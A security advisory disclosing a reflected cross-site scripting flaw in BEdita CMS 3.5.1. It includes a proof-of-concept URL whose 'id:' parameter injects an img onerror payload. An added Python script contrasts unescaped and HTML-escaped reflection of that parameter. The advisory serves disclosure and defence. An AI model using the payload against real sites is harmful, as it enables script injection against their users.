BEdita CMS 3.5.1 Cross Site Scripting

2015-03-03T00:00:00
ID PACKETSTORM:130621
Type packetstorm
Reporter Provensec
Modified 2015-03-03T00:00:00

Description

                                        
                                            `# Affected software: BEdita CMS  
# Type of vulnerability: cross site scripting  
# URL: bedita.com  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
# Description: *BEdita* is a web development *framework* that comes with a full  
featured CMS out of the box.  
# Proof of concept  
  
javascript executes on login page if you not logged in or no session  
initiated other wise javascript on respected page only  
  
http://i.imgur.com/1wU6lX7.png  
  
  
  
  
http://manage.demo.bedita.com/documents/index/id:%22%3E%3Cimg%20src=d%20onerror=confirm%281%29;%3E  
`
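As an added illustration (not BEdita's code and not from the advisory), the script below decodes the `id:` named parameter from the PoC URL above, reflects it through a hypothetical vulnerable template and through an HTML-escaping one, and uses a parser-based check to show that only the unescaped reflection yields an injected `onerror` handler. The template strings and the `named_param` helper are assumptions for the demonstration.

```python
"""Added example: reflected `id:` parameter, unsafe vs. escaped rendering.
Not BEdita's code; the templates below are hypothetical stand-ins."""
import html
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# PoC URL quoted in the advisory above.
POC_URL = ("http://manage.demo.bedita.com/documents/index/"
           "id:%22%3E%3Cimg%20src=d%20onerror=confirm%281%29;%3E")


def named_param(url: str, name: str) -> Optional[str]:
    """Extract a CakePHP-style 'name:value' path segment and URL-decode it."""
    for segment in urlsplit(url).path.split("/"):
        key, sep, value = segment.partition(":")
        if sep and key == name:
            return unquote(value)
    return None


def render_unsafe(value: str) -> str:
    """Hypothetical vulnerable template: echoes the value verbatim."""
    return f'<input name="id" value="{value}">'


def render_safe(value: str) -> str:
    """Hardened template: HTML-escape the value (quotes included) first."""
    return f'<input name="id" value="{html.escape(value, quote=True)}">'


class _HandlerFinder(HTMLParser):
    """Collects (tag, attribute) pairs for any on* event-handler attribute."""
    def __init__(self) -> None:
        super().__init__()
        self.handlers: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        for attr_name, _ in attrs:
            if attr_name.lower().startswith("on"):
                self.handlers.append((tag, attr_name))


def event_handlers(markup: str) -> List[Tuple[str, str]]:
    """Parse markup the way a browser tokenizes it and list on* handlers."""
    finder = _HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    payload = named_param(POC_URL, "id")
    print("decoded id:", payload)
    print("unsafe  ->", event_handlers(render_unsafe(payload)))  # [('img', 'onerror')]
    print("escaped ->", event_handlers(render_safe(payload)))    # []
```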